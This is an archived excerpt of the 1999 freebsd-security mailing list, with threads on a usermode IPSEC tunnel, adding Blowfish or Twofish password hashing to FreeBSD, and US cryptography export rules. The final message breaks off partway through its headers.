http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 14:31: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from fasterix.frmug.org (d166.paris-81.cybercable.fr [212.198.81.166]) by hub.freebsd.org (Postfix) with ESMTP id C086A1554A for ; Fri, 30 Apr 1999 14:31:01 -0700 (PDT) (envelope-from pb@fasterix.frmug.org) Received: (from pb@localhost) by fasterix.frmug.org (8.9.3/8.9.3/pb-19990315) id XAA45818 for freebsd-security@FreeBSD.ORG; Fri, 30 Apr 1999 23:31:00 +0200 (CEST) Message-ID: <19990430233059.B426@fasterix.frmug.fr.net> Date: Fri, 30 Apr 1999 23:30:59 +0200 From: Pierre Beyssac To: freebsd-security@FreeBSD.ORG Subject: Re: VPN References: <19990429223254.A19140@vogon.agala.harz.de> <19990430153659.1537714F69@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.92.8i In-Reply-To: <19990430153659.1537714F69@hub.freebsd.org>; from Jonathan M. Bresler on Fri, Apr 30, 1999 at 08:36:59AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 30, 1999 at 08:36:59AM -0700, Jonathan M. Bresler wrote: > > Don't use Microsoft PPTP, see http://www.counterpane.com/. > the problem is not with PPTP itself, but rather microsoft's > inimitable style of implementing protocols. BTW, as there seems to be a lot of interest in VPNs currently, and I had a need for something that could run between my FreeBSD box and a Linux box, I've written a small usermode IPSEC-compliant tunnel when I became tired of the impressive number of non-compatible hacks based on PPP, ssh, TCP, PPTP, you name it, while IPSEC clearly will sweep all of this. It's more of a proof-of-concept code for the moment (only fixed keys: it lacks key negociation stuff), and it can't beat a kernel implementation for performance, but it's easier to install, easier to port to other systems (you only need some kind of a "tun" device), easier to debug, easier to add weird crypto algorithms, easier to export (the crypto is from the OpenSSL library), and last but not least easier to distribute as a package external to the core OS. I'm happily running it between several FreeBSD and Linux boxes to setup tunnels to friends through my cable modem. If anyone is interested, it can be found here. WARNING: it's really experimental and the documentation is lacking, don't even bother if you don't know how to setup a point to point link or how to add the tun device to your kernel. http://www.enst.fr/~beyssac/tunip.tar.gz -- Pierre Beyssac pb@fasterix.frmug.org pb@fasterix.freenix.org {Free,Net,Open}BSD, Linux : il y a moins bien, mais c'est plus cher Free domains: http://www.eu.org/ or mail dns-manager@EU.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 21:44:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from mars.capital-data.com (mars.capital-data.com [156.46.8.135]) by hub.freebsd.org (Postfix) with ESMTP id 474A814F63 for ; Fri, 30 Apr 1999 21:44:27 -0700 (PDT) (envelope-from brian@capital-data.com) Received: by mars.capital-data.com (Postfix, from userid 1000) id 556D71D101; Fri, 30 Apr 1999 18:45:23 -0500 (CDT) Subject: Blowfish/Twofish To: freebsd-security@freebsd.org Date: Fri, 30 Apr 1999 18:45:23 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 90 Message-Id: <19990430234523.556D71D101@mars.capital-data.com> From: brian@capital-data.com (Brian Beaulieu) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Are there plans to implement the blowfish or twofish cipher into FreeBSD? Thanks, Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 23: 6:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.unacom.com (phoenix.unacom.com [206.113.48.50]) by hub.freebsd.org (Postfix) with SMTP id 3F3CD14FD7 for ; Fri, 30 Apr 1999 23:06:35 -0700 (PDT) (envelope-from geniusj@phoenix.unacom.com) Received: (qmail 69282 invoked by uid 1000); 1 May 1999 06:06:33 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 May 1999 06:06:33 -0000 Date: Sat, 1 May 1999 02:06:33 -0400 (EDT) From: The Tech-Admin Dude To: Brian Beaulieu Cc: freebsd-security@freebsd.org Subject: Re: Blowfish/Twofish In-Reply-To: <19990430234523.556D71D101@mars.capital-data.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is something i've wanted to know for a long time :).. It should adopt the passwd.conf settings from OpenBSD with selection of encryption, ratio, etc.. OpenBSD has a very good feature with that and it would be great if FreeBSD adopted it! :-) -Jason DiCioccio On Fri, 30 Apr 1999, Brian Beaulieu wrote: > Are there plans to implement the blowfish or twofish cipher into FreeBSD? > > Thanks, > > Brian > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 23:13:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id B4E1715148 for ; Fri, 30 Apr 1999 23:13:23 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id IAA17155; Sat, 1 May 1999 08:13:18 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id IAA21636; Sat, 1 May 1999 08:13:16 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: The Tech-Admin Dude Cc: Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Sat, 01 May 1999 02:06:33 EDT." Date: Sat, 01 May 1999 08:13:15 +0200 Message-ID: <21634.925539195@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , The Tech-Admin Du de writes: >This is something i've wanted to know for a long time :).. It should adopt >the passwd.conf settings from OpenBSD with selection of encryption, ratio, >etc.. OpenBSD has a very good feature with that and it would be great if >FreeBSD adopted it! :-) Make patches send-pr -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 30 23:32: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 89B1C14F9E for ; Fri, 30 Apr 1999 23:32:03 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from lal.cs.utah.edu (lal.cs.utah.edu [155.99.195.65]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id AAA27853; Sat, 1 May 1999 00:31:50 -0600 (MDT) From: David G Andersen Received: (from danderse@localhost) by lal.cs.utah.edu (8.8.8/8.8.8) id AAA21013; Sat, 1 May 1999 00:31:48 -0600 (MDT) Message-Id: <199905010631.AAA21013@lal.cs.utah.edu> Subject: Re: Blowfish/Twofish To: freebsd-security@freebsd.org Date: Sat, 1 May 1999 00:31:48 -0600 (MDT) Cc: geniusj@phoenix.unacom.com, brian@capital-data.com In-Reply-To: <21634.925539195@critter.freebsd.dk> from "Poul-Henning Kamp" at May 1, 99 08:13:15 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Poul-Henning Kamp once said: > > >This is something i've wanted to know for a long time :).. It should adopt > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > >etc.. OpenBSD has a very good feature with that and it would be great if > >FreeBSD adopted it! :-) > > Make patches > send-pr Note that OpenBSD passwd file work was actually implemented by a person outside of the US, and it would likely be advantageous if the FreeBSD situation were to be handled similarly. Parts of the design were done domestically, but the code was kept out, which simplifies distribution somewhat. -Dave -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group "What's footnote FIVE?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 1 6:35:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id E831414CBA for ; Sat, 1 May 1999 06:35:54 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id XAA09651; Sat, 1 May 1999 23:05:49 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA23756; Sat, 1 May 1999 23:06:23 +0930 Date: Sat, 1 May 1999 23:06:18 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Poul-Henning Kamp Cc: The Tech-Admin Dude , Brian Beaulieu , freebsd-security@freebsd.org Subject: Re: Blowfish/Twofish In-Reply-To: <21634.925539195@critter.freebsd.dk> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 1 May 1999, Poul-Henning Kamp wrote: > In message , The Tech-Admin Du > de writes: > > >This is something i've wanted to know for a long time :).. It should adopt > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > >etc.. OpenBSD has a very good feature with that and it would be great if > >FreeBSD adopted it! :-) > > Make patches > send-pr This is a project I've had lurking in my head for a while now - I want to test 3.1-stable for the week and a bit leading up to the code freeze (and test various backports prior to comitting) but after that I might look at doing this. Kris > > -- > Poul-Henning Kamp FreeBSD coreteam member > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > FreeBSD -- It will take a long time before progress goes too far! > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > ----- The Feynman problem-solving algorithm: 1. Write down the problem 2. Think real hard 3. Write down the solution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 1 12:11:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5874A15ADF for ; Sat, 1 May 1999 12:11:06 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id PAA03308; Sat, 1 May 1999 15:07:31 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Sat, 1 May 1999 15:07:30 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Poul-Henning Kamp Cc: The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: <21634.925539195@critter.freebsd.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So I'd gladly write this code, as well as do a number of other crypto-related things, but I'm inside the US. Someone outside the US will have to take this initiative, I'm afraid. I'd recommend against using Blowfish--go for Twofish. On Sat, 1 May 1999, Poul-Henning Kamp wrote: > In message , The Tech-Admin Du > de writes: > > >This is something i've wanted to know for a long time :).. It should adopt > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > >etc.. OpenBSD has a very good feature with that and it would be great if > >FreeBSD adopted it! :-) > > Make patches > send-pr > > -- > Poul-Henning Kamp FreeBSD coreteam member > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > FreeBSD -- It will take a long time before progress goes too far! > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 1 12:45:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from bonjour.cc.columbia.edu (bonjour.cc.columbia.edu [128.59.59.133]) by hub.freebsd.org (Postfix) with ESMTP id F183514BF9 for ; Sat, 1 May 1999 12:45:42 -0700 (PDT) (envelope-from stuyman@confusion.net) Received: from confusion.net (dialup-11-15.cc.columbia.edu [128.59.36.251]) by bonjour.cc.columbia.edu (8.8.5/8.8.5) with ESMTP id PAA18314; Sat, 1 May 1999 15:32:08 -0400 (EDT) Message-ID: <372B5684.30237E81@confusion.net> Date: Sat, 01 May 1999 15:31:16 -0400 From: Laurence Berland Organization: B.R.A.T.T. X-Mailer: Mozilla 4.5 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Robert Watson Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Really? As I understand the export bans, it's ok to export it on paper, then scan it in somewhere else, so you can mail it to someone outside the US, they scan it, and the source tree is synced. Maybe I'm wrong. Speaking of which, is there any good OCR (or scanning in general) software for FreeBSD, I'm thinking of getting a scanner. Robert Watson wrote: > So I'd gladly write this code, as well as do a number of other > crypto-related things, but I'm inside the US. Someone outside the US will > have to take this initiative, I'm afraid. > > I'd recommend against using Blowfish--go for Twofish. > > On Sat, 1 May 1999, Poul-Henning Kamp wrote: > > > In message , The Tech-Admin Du > > de writes: > > > > >This is something i've wanted to know for a long time :).. It should adopt > > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > > >etc.. OpenBSD has a very good feature with that and it would be great if > > >FreeBSD adopted it! :-) > > > > Make patches > > send-pr > > > > -- > > Poul-Henning Kamp FreeBSD coreteam member > > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > > FreeBSD -- It will take a long time before progress goes too far! > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > Robert N Watson > > -- Laurence Berland, Stuyvesant HS Debate <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Windows 98: n. useless extension to a minor patch release for 32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand for 1 bit of competition. http://stuy.debate.net icq #7434346 aol imer E1101 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 1 16:14:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from etosha (modem09.tdnet.com.br [200.236.148.202]) by hub.freebsd.org (Postfix) with SMTP id 678F914C36 for ; Sat, 1 May 1999 16:13:54 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: (qmail 952 invoked from network); 1 May 1999 23:14:19 -0000 Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 1 May 1999 23:14:19 -0000 Message-ID: <372B8ACA.764E20FD@tdnet.com.br> Date: Sat, 01 May 1999 20:14:18 -0300 From: Gustavo V G C Rios X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: security@freebsd.org Subject: security advisories Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The page http://www.freebsd.org/security/ has some advisories, but how can i work with them? How to read the *.asc files? Which softwares should i use to read them ? Thanks a lot! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 1 20:33:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.andrew.cmu.edu (SMTP1.ANDREW.CMU.EDU [128.2.10.81]) by hub.freebsd.org (Postfix) with ESMTP id A9CEF14E88 for ; Sat, 1 May 1999 20:33:26 -0700 (PDT) (envelope-from Harry_M_Leitzell@cmu.edu) Received: from unix13.andrew.cmu.edu (UNIX13.ANDREW.CMU.EDU [128.2.15.17]) by smtp1.andrew.cmu.edu (8.8.5/8.8.2) with SMTP id XAA26461; Sat, 1 May 1999 23:13:15 -0400 (EDT) Date: Sat, 1 May 1999 23:13:16 -0400 (EDT) From: "Harry M. Leitzell" X-Sender: Harry_M_Leitzell@unix13.andrew.cmu.edu To: Robert Watson Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am unaware of the restriction laws placed upon the US in terms of encryption. Could someone clarify them for me? 1) If Robert were to write code on a machine that is in a foreign country, would it have been considered exported? (Xterm on a cs.hut.fi machine for example to code in) Even if he is in the US while doing so? 2) Can we still do the moving by paper to another country and scanning it in? Is that legitimate or been deemed illegal? 3) If I write a disk encryptor that sits on the MBR and transfer the disk out of country, is that a no-no? Thanks On Sat, 1 May 1999, Robert Watson wrote: > > So I'd gladly write this code, as well as do a number of other > crypto-related things, but I'm inside the US. Someone outside the US will > have to take this initiative, I'm afraid. > > I'd recommend against using Blowfish--go for Twofish. > > On Sat, 1 May 1999, Poul-Henning Kamp wrote: > > > In message , The Tech-Admin Du > > de writes: > > > > >This is something i've wanted to know for a long time :).. It should adopt > > >the passwd.conf settings from OpenBSD with selection of encryption, ratio, > > >etc.. OpenBSD has a very good feature with that and it would be great if > > >FreeBSD adopted it! :-) > > > > Make patches > > send-pr > > > > -- > > Poul-Henning Kamp FreeBSD coreteam member > > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > > FreeBSD -- It will take a long time before progress goes too far! > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > Robert N Watson > > robert@fledge.watson.org http://www.watson.org/~robert/ > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > > Carnegie Mellon University http://www.cmu.edu/ > TIS Labs at Network Associates, Inc. http://www.tis.com/ > Safeport Network Services http://www.safeport.com/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 1 21:27:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 9A5E214D6D for ; Sat, 1 May 1999 21:27:12 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id NAA12350; Sun, 2 May 1999 13:57:10 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA29203; Sun, 2 May 1999 13:57:45 +0930 Date: Sun, 2 May 1999 13:57:45 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: "Harry M. Leitzell" Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@freebsd.org Subject: Re: Blowfish/Twofish In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 1 May 1999, Harry M. Leitzell wrote: > I am unaware of the restriction laws placed upon the US in terms of > encryption. Could someone clarify them for me? As I understand it, it's illegal to export products containing cryptography stronger than certain prescribed key lengths outside the US without a permit. There are exceptions, such as financial instititutions and subsidiaries of US companies, and recently "e-Commerce" client/server applications also (e.g. SSL-enabled commerce services, but not general-purpose web browsers), but for general-purpose applications you're limited to something like 40-bit and (limited) 56-bit encryption keys. There's been a lot of pressure on the US government to ease these restrictions (which they claim are targeted against "terrorists" using encryption to mask their activities) but progress has been slow in getting them to open up the regulations. > 1) If Robert were to write code on a machine that is in a foreign > country, would it have been considered exported? (Xterm on a cs.hut.fi > machine for example to code in) Even if he is in the US while doing so? Yes. Also if a foreigner were to download restricted crypto code from say an FTP server in the US then the owner of the site could conceivably be put up for treason charges :-) This is why FreeBSD (and other projects) either maintain their cryptography code outside the US (the OpenBSD project is housed in Canada), or have two separate repositories (domestic and international). I'd guess that synching "supporting" code changes unrelated to the actual encryption process between the two repositories is legal providing none of the actual cryptography-making code leaves the US. > 2) Can we still do the moving by paper to another country and > scanning it in? Is that legitimate or been deemed illegal? That's still a loophole, ISTR - it's how the PGP 5.0 sources were exported to finland and published there. Hmm..I recall half-hearing a story recently about a guy who found himself being classified as a munition after trying to "export" the restricted cryptography code which was written or tattooed onto his arm. Was I dreaming? :) > 3) If I write a disk encryptor that sits on the MBR and transfer the > disk out of country, is that a no-no? I'd say so. If these issues are relevant to you then I recommand you look into the exact regs further..they're fairly involved. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, That's sharp!" - Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:25:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id B2B9614D9D for ; Sun, 2 May 1999 02:25:32 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:525 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <7971-20162>; Sun, 2 May 1999 11:25:11 +0200 Message-ID: <372C19F5.625BB2B@vangelderen.org> Date: Sun, 02 May 1999 11:25:09 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Robert Watson Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson wrote: [...] > I'd recommend against using Blowfish--go for Twofish. Regardless of what you think about Blowfish, recommending Twofish is a very, very bad move. The golden rule in crypto is that trust comes with the age of an algorithm. Twofish is waaaay to young to be trusted, especially since it's an evolutionary improvement over Blowfish which you don't like for some reason. In any case, if you recommend against using Blowfish, what's the reason? Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:30:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6515814F95 for ; Sun, 2 May 1999 02:30:46 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id LAA21806; Sun, 2 May 1999 11:30:45 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id LAA02572; Sun, 2 May 1999 11:30:44 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "Jeroen C. van Gelderen" Cc: Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Sun, 02 May 1999 11:25:09 +0200." <372C19F5.625BB2B@vangelderen.org> Date: Sun, 02 May 1999 11:30:44 +0200 Message-ID: <2570.925637444@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <372C19F5.625BB2B@vangelderen.org>, "Jeroen C. van Gelderen" writes: >Robert Watson wrote: >[...] >> I'd recommend against using Blowfish--go for Twofish. > >Regardless of what you think about Blowfish, recommending Twofish >is a very, very bad move. Considering that the concept for passwords is a "kleenex-model", it doesn't matter. We can change the algorithm at the first hint of trouble and ask people to change passwords and we're in safe water. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:36:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 2CFBF1511D for ; Sun, 2 May 1999 02:36:08 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id CAA23336; Sun, 2 May 1999 02:32:55 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: "Jeroen C. van Gelderen" Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Sun, 02 May 1999 11:25:09 +0200." <372C19F5.625BB2B@vangelderen.org> Date: Sun, 02 May 1999 02:32:55 -0700 Message-ID: <23332.925637575@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Regardless of what you think about Blowfish, recommending Twofish > is a very, very bad move. The golden rule in crypto is that trust > comes with the age of an algorithm. Twofish is waaaay to young to > be trusted, especially since it's an evolutionary improvement > over Blowfish which you don't like for some reason. Erm, one of the goals of PAM is to support *multiple* encryption methods, so why not do a PAM module for each and let the administrator decide which authentication methods to support in /etc/pam.conf? - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:36:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 47B82159F8 for ; Sun, 2 May 1999 02:36:42 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id CAA23358; Sun, 2 May 1999 02:33:28 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Poul-Henning Kamp Cc: "Jeroen C. van Gelderen" , Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Sun, 02 May 1999 11:30:44 +0200." <2570.925637444@critter.freebsd.dk> Date: Sun, 02 May 1999 02:33:27 -0700 Message-ID: <23355.925637607@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Considering that the concept for passwords is a "kleenex-model", OK, I'll bite, what the hell is a "kleenex-model" ? :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:37:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 1CF03152D2 for ; Sun, 2 May 1999 02:37:49 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:2061 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <7971-20149>; Sun, 2 May 1999 11:37:31 +0200 Message-ID: <372C1CD9.43BE5852@vangelderen.org> Date: Sun, 02 May 1999 11:37:29 